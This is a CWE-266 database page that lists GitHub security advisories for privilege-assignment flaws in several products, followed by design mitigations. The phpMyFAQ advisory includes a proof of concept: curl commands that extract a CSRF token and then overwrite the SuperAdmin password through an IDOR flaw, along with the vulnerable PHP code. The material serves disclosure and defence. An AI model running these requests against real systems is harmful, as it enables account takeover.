Common Weakness Enumeration

CWE-266

Allowed

Incorrect Privilege Assignment

Abstraction: Base · Status: Draft

A product incorrectly assigns a privilege to a particular actor, creating an unintended sphere of control for that actor.

1912 vulnerabilities reference this CWE, most recent first.

GHSA-XFGC-QG25-X5JW

Vulnerability from github – Published: 2025-02-06 18:31 – Updated: 2025-02-06 18:31
VLAI
Details

A vulnerability has been found in AppHouseKitchen AlDente Charge Limiter up to 1.29 on macOS and classified as critical. This vulnerability affects the function shouldAcceptNewConnection of the file com.apphousekitchen.aldente-pro.helper of the component XPC Service. The manipulation leads to improper authorization. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. Upgrading to version 1.30 is able to address this issue. It is recommended to upgrade the affected component. The vendor was contacted early about this disclosure and acted very professional.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-1078"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-266"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-02-06T17:15:21Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability has been found in AppHouseKitchen AlDente Charge Limiter up to 1.29 on macOS and classified as critical. This vulnerability affects the function shouldAcceptNewConnection of the file com.apphousekitchen.aldente-pro.helper of the component XPC Service. The manipulation leads to improper authorization. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. Upgrading to version 1.30 is able to address this issue. It is recommended to upgrade the affected component. The vendor was contacted early about this disclosure and acted very professional.",
  "id": "GHSA-xfgc-qg25-x5jw",
  "modified": "2025-02-06T18:31:05Z",
  "published": "2025-02-06T18:31:05Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1078"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?ctiid.294844"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?id.294844"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?submit.492529"
    },
    {
      "type": "WEB",
      "url": "https://winslow1984.com/books/cve-collection/page/aldente-charge-limiter-130-unauthorized-privileged-hardware-operations"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-XFJ2-Q583-73RV

Vulnerability from github – Published: 2025-04-09 09:31 – Updated: 2025-04-09 09:31
VLAI
Details

Incorrect privilege assignment vulnerability in the WEB UI (the setting page) exists in Wi-Fi AP UNIT 'AC-WPS-11ac series'. If exploited, a remote attacker who can log in to the product may alter the settings without appropriate privileges.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-23407"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-266"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-04-09T09:15:15Z",
    "severity": "MODERATE"
  },
  "details": "Incorrect privilege assignment vulnerability in the WEB UI (the setting page) exists in Wi-Fi AP UNIT \u0027AC-WPS-11ac series\u0027. If exploited, a remote attacker who can log in to the product may alter the settings without appropriate privileges.",
  "id": "GHSA-xfj2-q583-73rv",
  "modified": "2025-04-09T09:31:24Z",
  "published": "2025-04-09T09:31:24Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-23407"
    },
    {
      "type": "WEB",
      "url": "https://jvn.jp/en/vu/JVNVU93925742"
    },
    {
      "type": "WEB",
      "url": "https://www.inaba.co.jp/abaniact/news/security_20250404.pdf"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-XMRX-VG29-JH4H

Vulnerability from github – Published: 2024-12-19 15:31 – Updated: 2024-12-27 09:30
VLAI
Details

A vulnerability has been found in Fujifilm Apeos C3070, Apeos C5570 and Apeos C6580 up to 24.8.28 and classified as critical. This vulnerability affects unknown code of the file /home/index.html#hashHome of the component Web Interface. The manipulation leads to improper authorization. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-12782"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-266"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-12-19T13:15:05Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability has been found in Fujifilm Apeos C3070, Apeos C5570 and Apeos C6580 up to 24.8.28 and classified as critical. This vulnerability affects unknown code of the file /home/index.html#hashHome of the component Web Interface. The manipulation leads to improper authorization. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.",
  "id": "GHSA-xmrx-vg29-jh4h",
  "modified": "2024-12-27T09:30:47Z",
  "published": "2024-12-19T15:31:11Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-12782"
    },
    {
      "type": "WEB",
      "url": "https://github.com/dycccccccc/Fuji/blob/main/Fujifilm%20Business%20Innovation.docx"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?ctiid.288958"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?id.288958"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?submit.458897"
    },
    {
      "type": "WEB",
      "url": "https://www.fujifilm.com/fbglobal/eng/company/news/notice/2024/1226_announce.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-XMV6-8RVM-WW7W

Vulnerability from github – Published: 2026-06-21 06:32 – Updated: 2026-06-21 06:32
VLAI
Details

A vulnerability was found in AOMEI Dynamic Disk Manager up to 10.10.1. This issue affects some unknown processing in the library ddmdrv.sys of the component Kernel Driver. Performing a manipulation results in improper access controls. The attack must be initiated from a local position. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-12779"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-266"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-06-21T06:16:22Z",
    "severity": "HIGH"
  },
  "details": "A vulnerability was found in AOMEI Dynamic Disk Manager up to 10.10.1. This issue affects some unknown processing in the library ddmdrv.sys of the component Kernel Driver. Performing a manipulation results in improper access controls. The attack must be initiated from a local position. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.",
  "id": "GHSA-xmv6-8rvm-ww7w",
  "modified": "2026-06-21T06:32:07Z",
  "published": "2026-06-21T06:32:07Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-12779"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/cve/CVE-2026-12779"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/submit/835608"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/vuln/372520"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/vuln/372520/cti"
    },
    {
      "type": "WEB",
      "url": "https://winslow1984.com/books/cve-collection/page/aomei-dynamic-disk-manager-10101-kernel-driver-ddmdrvsys-local-privilege-escalation"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-XPCG-RH9R-MM78

Vulnerability from github – Published: 2025-09-04 12:30 – Updated: 2025-09-04 12:30
VLAI
Details

A vulnerability was identified in fuyang_lipengjun platform 1.0.0. This issue affects the function AdController of the file /ad/queryAll. The manipulation leads to improper authorization. The attack is possible to be carried out remotely. The exploit is publicly available and might be used.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-9936"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-266"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-09-04T10:42:37Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability was identified in fuyang_lipengjun platform 1.0.0. This issue affects the function AdController of the file /ad/queryAll. The manipulation leads to improper authorization. The attack is possible to be carried out remotely. The exploit is publicly available and might be used.",
  "id": "GHSA-xpcg-rh9r-mm78",
  "modified": "2025-09-04T12:30:43Z",
  "published": "2025-09-04T12:30:43Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-9936"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?ctiid.322338"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?id.322338"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?submit.643388"
    },
    {
      "type": "WEB",
      "url": "https://www.cnblogs.com/aibot/p/19063425"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-XQ22-WJFR-V6CF

Vulnerability from github – Published: 2025-03-31 12:30 – Updated: 2025-03-31 12:30
VLAI
Details

A vulnerability, which was classified as critical, has been found in Tenda FH1202 1.2.0.14(408). Affected by this issue is some unknown functionality of the file /default.cfg. The manipulation of the argument these leads to improper access controls. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-2993"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-266"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-03-31T12:15:15Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability, which was classified as critical, has been found in Tenda FH1202 1.2.0.14(408). Affected by this issue is some unknown functionality of the file /default.cfg. The manipulation of the argument these leads to improper access controls. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.",
  "id": "GHSA-xq22-wjfr-v6cf",
  "modified": "2025-03-31T12:30:45Z",
  "published": "2025-03-31T12:30:45Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-2993"
    },
    {
      "type": "WEB",
      "url": "https://lavender-bicycle-a5a.notion.site/Tenda-FH1202-default-cfg-1bc53a41781f806d8016cd4e73ca4d6f?pvs=4"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?ctiid.302042"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?id.302042"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?submit.523416"
    },
    {
      "type": "WEB",
      "url": "https://www.tenda.com.cn"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-XQCM-JRW9-WQ72

Vulnerability from github – Published: 2026-02-13 00:32 – Updated: 2026-02-18 21:31
VLAI
Details

A flaw was found in Dropbear. When running in multi-user mode and authenticating users, the dropbear ssh server does the socket forwardings requested by the remote client as root, only switching to the logged-in user upon spawning a shell or performing some operations like reading the user's files. With the recent ability of also using unix domain sockets as the forwarding destination any user able to log in via ssh can connect to any unix socket with the root's credentials, bypassing both file system restrictions and any SO_PEERCRED / SO_PASSCRED checks performed by the peer.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-14282"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-266"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-02-12T22:16:03Z",
    "severity": "MODERATE"
  },
  "details": "A flaw was found in Dropbear. When running in multi-user mode and authenticating users, the dropbear ssh server does the socket forwardings requested by the remote client as root, only switching to the logged-in user upon spawning a shell or performing some operations like reading the user\u0027s files. With the recent ability of also using unix domain sockets as the forwarding destination any user able to log in via ssh can connect to any unix socket with the root\u0027s credentials, bypassing both file system restrictions and any SO_PEERCRED / SO_PASSCRED checks performed by the peer.",
  "id": "GHSA-xqcm-jrw9-wq72",
  "modified": "2026-02-18T21:31:18Z",
  "published": "2026-02-13T00:32:51Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14282"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mkj/dropbear/pull/391"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mkj/dropbear/pull/394"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/security/cve/CVE-2025-14282"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2420052"
    },
    {
      "type": "WEB",
      "url": "https://lists.ucc.gu.uwa.edu.au/pipermail/dropbear/2025q4/002390.html"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2025/12/16/4"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2025/12/17/1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-XR44-7HQV-MRGR

Vulnerability from github – Published: 2025-12-04 21:31 – Updated: 2025-12-04 21:31
VLAI
Details

A security vulnerability has been detected in macrozheng mall-swarm up to 1.0.3. Affected is the function delete of the file /member/readHistory/delete. Such manipulation of the argument ids leads to improper authorization. The attack can be executed remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-14016"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-266",
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-12-04T19:16:03Z",
    "severity": "MODERATE"
  },
  "details": "A security vulnerability has been detected in macrozheng mall-swarm up to 1.0.3. Affected is the function delete of the file /member/readHistory/delete. Such manipulation of the argument ids leads to improper authorization. The attack can be executed remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.",
  "id": "GHSA-xr44-7hqv-mrgr",
  "modified": "2025-12-04T21:31:04Z",
  "published": "2025-12-04T21:31:04Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14016"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Hwwg/cve/issues/17"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?ctiid.334257"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?id.334257"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?submit.694797"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-XVG5-76PR-547Q

Vulnerability from github – Published: 2026-06-01 06:30 – Updated: 2026-06-01 06:30
VLAI
Details

A flaw has been found in nextlevelbuilder GoClaw up to 3.11.3. The impacted element is the function handleSave of the file internal/http/tts_config.go of the component RoleAdmin Gateway. This manipulation causes improper privilege management. Remote exploitation of the attack is possible. The exploit has been published and may be used. The project tagged the reported issue as bug.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-10217"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-266"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-06-01T04:16:20Z",
    "severity": "LOW"
  },
  "details": "A flaw has been found in nextlevelbuilder GoClaw up to 3.11.3. The impacted element is the function handleSave of the file internal/http/tts_config.go of the component RoleAdmin Gateway. This manipulation causes improper privilege management. Remote exploitation of the attack is possible. The exploit has been published and may be used. The project tagged the reported issue as bug.",
  "id": "GHSA-xvg5-76pr-547q",
  "modified": "2026-06-01T06:30:25Z",
  "published": "2026-06-01T06:30:25Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-10217"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nextlevelbuilder/goclaw/issues/1118"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nextlevelbuilder/goclaw"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/cve/CVE-2026-10217"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/submit/821937"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/vuln/367496"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/vuln/367496/cti"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-XVP4-PHQJ-CJR3

Vulnerability from github – Published: 2026-05-20 15:46 – Updated: 2026-05-28 14:19
VLAI
Summary
phpMyFAQ: IDOR Account Takeover
Details

Summary

An Insecure Direct Object Reference (IDOR) vulnerability in phpMyFAQ's Admin API allows any authenticated administrator to change the password of any user account, including SuperAdmin accounts (userId=1), without authorization verification. An attacker with a low-privilege admin account can escalate privileges to full SuperAdmin control by simply changing the target user's ID in the API request body.

Details

File: phpmyfaq/src/phpMyFAQ/Controller/Administration/Api/UserController.php Lines: 232-271 The overwritePassword() method at line 232 accepts PUT requests to /admin/api/user/overwrite-password:

[Route(path: 'user/overwrite-password', name: 'admin.api.user.overwrite-password', methods: ['PUT'])]

public function overwritePassword(Request $request): JsonResponse
{
    $this->userHasUserPermission();  // Only checks if user has USER_EDIT permission
    $currentUser = CurrentUser::getCurrentUser($this->configuration);
    $data = json_decode($request->getContent());
    $userId = Filter::filterVar($data->userId, FILTER_VALIDATE_INT);  // User-controlled!
    $csrfToken = Filter::filterVar($data->csrf, FILTER_SANITIZE_SPECIAL_CHARS);
    $newPassword = Filter::filterVar($data->newPassword, FILTER_SANITIZE_SPECIAL_CHARS);
    $retypedPassword = Filter::filterVar($data->passwordRepeat, FILTER_SANITIZE_SPECIAL_CHARS);
    if (!Token::getInstance($this->session)->verifyToken(page: 'overwrite-password', requestToken: $csrfToken)) {
        return $this->json(['error' => ...], Response::HTTP_UNAUTHORIZED);
    }
    // NO check that $userId belongs to a user the admin should manage
    // NO check that target user has lower or equal privileges
    // Can overwrite password for ANY user, including SuperAdmin (userId=1)
    $currentUser->getUserById((int) $userId, allowBlockedUsers: true);
    $authSource->getEncryptionContainer($currentUser->getAuthData(key: 'encType'));
    if (hash_equals($newPassword, $retypedPassword)) {
        if (!$currentUser->changePassword($newPassword)) {
            return $this->json(['error' => ...], Response::HTTP_BAD_REQUEST);
        }
        $this->adminLog->log($this->currentUser, AdminLogType::USER_CHANGE_PASSWORD->value . ':' . $userId);
        return $this->json(['success' => ...], Response::HTTP_OK);
    }
}

Root Causes:

  1. No verification that the requesting admin has permission to modify the target user's password
  2. No check that the target user has equal or lower privilege level
  3. The userId is taken directly from the request body without authorization context
  4. No multi-factor confirmation for privilege-escalating password changes

PoC

Prerequisites: Authenticated admin session with USER_EDIT permission

Step 1 - Obtain Admin Session: Log in as a low-privilege admin user (or exploit CVE-2026-XXXX-1 to take over any user first).

Step 2 - Extract CSRF Token: CSRF token is embedded in admin pages:

curl -sL -b "PHPSESSID=admin_session" http://target/admin/index.php | grep -oP 'pmf-csrf-token.*?value="\K[^"]+'

Step 3 - Change SuperAdmin Password:

curl -X PUT -H "Content-Type: application/json" \
  -b "PHPSESSID=admin_session" \
  -d '{
    "userId": 1,
    "csrf": "admin_csrf_token_value",
    "newPassword": "NewSuperAdminP@ss123!",
    "passwordRepeat": "NewSuperAdminP@ss123!"
  }' \
  http://target/admin/api/user/overwrite-password

Response: {"success":"The password was successfully changed."}

Step 4 - Account Takeover: Attacker now has SuperAdmin credentials and full control of phpMyFAQ.

Who is Impacted:

  • Organizations with multiple admin users where not all should have SuperAdmin access
  • Any phpMyFAQ instance where privilege separation is configured
  • Multi-tenant environments where users should only manage their own accounts

Attack Complexity: Low - only requires a valid admin session with USER_EDIT permission

Privilege Escalation: Any admin user can become SuperAdmin regardless of their assigned permissions

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "thorsten/phpmyfaq"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.1.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "phpmyfaq/phpmyfaq"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.1.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-35671"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-266",
      "CWE-269",
      "CWE-639",
      "CWE-862"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-20T15:46:17Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\nAn Insecure Direct Object Reference (IDOR) vulnerability in phpMyFAQ\u0027s Admin API allows any authenticated administrator to change the password of any user account, including SuperAdmin accounts (userId=1), without authorization verification. An attacker with a low-privilege admin account can escalate privileges to full SuperAdmin control by simply changing the target user\u0027s ID in the API request body.\n\n### Details\nFile: phpmyfaq/src/phpMyFAQ/Controller/Administration/Api/UserController.php\nLines: 232-271\nThe overwritePassword() method at line 232 accepts PUT requests to /admin/api/user/overwrite-password:\n#[Route(path: \u0027user/overwrite-password\u0027, name: \u0027admin.api.user.overwrite-password\u0027, methods: [\u0027PUT\u0027])]\n```php\npublic function overwritePassword(Request $request): JsonResponse\n{\n    $this-\u003euserHasUserPermission();  // Only checks if user has USER_EDIT permission\n    $currentUser = CurrentUser::getCurrentUser($this-\u003econfiguration);\n    $data = json_decode($request-\u003egetContent());\n    $userId = Filter::filterVar($data-\u003euserId, FILTER_VALIDATE_INT);  // User-controlled!\n    $csrfToken = Filter::filterVar($data-\u003ecsrf, FILTER_SANITIZE_SPECIAL_CHARS);\n    $newPassword = Filter::filterVar($data-\u003enewPassword, FILTER_SANITIZE_SPECIAL_CHARS);\n    $retypedPassword = Filter::filterVar($data-\u003epasswordRepeat, FILTER_SANITIZE_SPECIAL_CHARS);\n    if (!Token::getInstance($this-\u003esession)-\u003everifyToken(page: \u0027overwrite-password\u0027, requestToken: $csrfToken)) {\n        return $this-\u003ejson([\u0027error\u0027 =\u003e ...], Response::HTTP_UNAUTHORIZED);\n    }\n    // NO check that $userId belongs to a user the admin should manage\n    // NO check that target user has lower or equal privileges\n    // Can overwrite password for ANY user, including SuperAdmin (userId=1)\n    $currentUser-\u003egetUserById((int) $userId, allowBlockedUsers: true);\n    $authSource-\u003egetEncryptionContainer($currentUser-\u003egetAuthData(key: \u0027encType\u0027));\n    if (hash_equals($newPassword, $retypedPassword)) {\n        if (!$currentUser-\u003echangePassword($newPassword)) {\n            return $this-\u003ejson([\u0027error\u0027 =\u003e ...], Response::HTTP_BAD_REQUEST);\n        }\n        $this-\u003eadminLog-\u003elog($this-\u003ecurrentUser, AdminLogType::USER_CHANGE_PASSWORD-\u003evalue . \u0027:\u0027 . $userId);\n        return $this-\u003ejson([\u0027success\u0027 =\u003e ...], Response::HTTP_OK);\n    }\n}\n```\n\n### Root Causes:\n1. No verification that the requesting admin has permission to modify the target user\u0027s password\n2. No check that the target user has equal or lower privilege level\n3. The userId is taken directly from the request body without authorization context\n4. No multi-factor confirmation for privilege-escalating password changes\n\n\n### PoC\n\nPrerequisites: Authenticated admin session with USER_EDIT permission\n\nStep 1 - Obtain Admin Session:\nLog in as a low-privilege admin user (or exploit CVE-2026-XXXX-1 to take over any user first).\n\nStep 2 - Extract CSRF Token:\nCSRF token is embedded in admin pages:\n```bash\ncurl -sL -b \"PHPSESSID=admin_session\" http://target/admin/index.php | grep -oP \u0027pmf-csrf-token.*?value=\"\\K[^\"]+\u0027\n```\n\nStep 3 - Change SuperAdmin Password:\n```bash\ncurl -X PUT -H \"Content-Type: application/json\" \\\n  -b \"PHPSESSID=admin_session\" \\\n  -d \u0027{\n    \"userId\": 1,\n    \"csrf\": \"admin_csrf_token_value\",\n    \"newPassword\": \"NewSuperAdminP@ss123!\",\n    \"passwordRepeat\": \"NewSuperAdminP@ss123!\"\n  }\u0027 \\\n  http://target/admin/api/user/overwrite-password\n```\n\nResponse: {\"success\":\"The password was successfully changed.\"}\n\nStep 4 - Account Takeover:\nAttacker now has SuperAdmin credentials and full control of phpMyFAQ.\n\n### Who is Impacted:\n- Organizations with multiple admin users where not all should have SuperAdmin access\n- Any phpMyFAQ instance where privilege separation is configured\n- Multi-tenant environments where users should only manage their own accounts\n\n#### Attack Complexity: Low - only requires a valid admin session with USER_EDIT permission\n#### Privilege Escalation: Any admin user can become SuperAdmin regardless of their assigned permissions",
  "id": "GHSA-xvp4-phqj-cjr3",
  "modified": "2026-05-28T14:19:40Z",
  "published": "2026-05-20T15:46:17Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-xvp4-phqj-cjr3"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/thorsten/phpMyFAQ"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "phpMyFAQ: IDOR Account Takeover "
}

Mitigation MIT-1
Architecture and Design Operation

Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software.

Mitigation MIT-17
Architecture and Design Operation

Strategy: Environment Hardening

Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations.

No CAPEC attack patterns related to this CWE.